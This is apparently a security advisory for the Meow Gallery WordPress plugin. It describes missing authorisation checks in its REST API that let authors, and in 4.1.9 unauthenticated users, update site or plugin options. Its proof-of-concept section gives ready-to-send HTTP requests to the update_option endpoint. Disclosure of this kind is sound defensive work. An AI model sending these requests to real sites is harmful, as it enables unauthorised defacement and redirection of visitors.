Meow Gallery < 4.2.0 – Unauthorised Arbitrary Options Update via REST API

Description

The plugin does not properly check for capability in its REST API, allowing
- Any authenticated user with the upload_file capability (such as author+) to call them in versions before 4.1.9
- Any unauthenticated user to call them except the rest_all_settings endpoint, in 4.1.9

One endpoint in particular could be used to update arbitrary options as there is also no validation done to ensure that the option belong to the plugin (in v < 4.1.6). As a result, attackers can update
- arbitrary options from the blog, such the 'home' which would redirect all users to another website in versions before 4.1.6
- arbitrary options from the plugin since 4.1.6

In 4.2.0, other endpoints were also given proper authorisation checks.

Proof of Concept

In version below 4.1.6, any WP options can be changed, such as the blog name etc. Since v4.1.6, only the options belonging to the plugin can be changed (see https://plugins.trac.wordpress.org/browser/meow-gallery/trunk/classes/rest.php?rev=2590365#L90 for the list)

POST /wp-json/meow-gallery/v1/update_option/ HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [author+]
Content-Type: application/json; charset=UTF-8
Content-Length: 37

{"name":"blogname", "value":"Hacked"}


In v4.1.9, unauthenticated user can call the endpoint

POST /wp-json/meow-gallery/v1/update_option/ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 42
Connection: close

{"name":"mgl_layout", "value":"arbitrary"}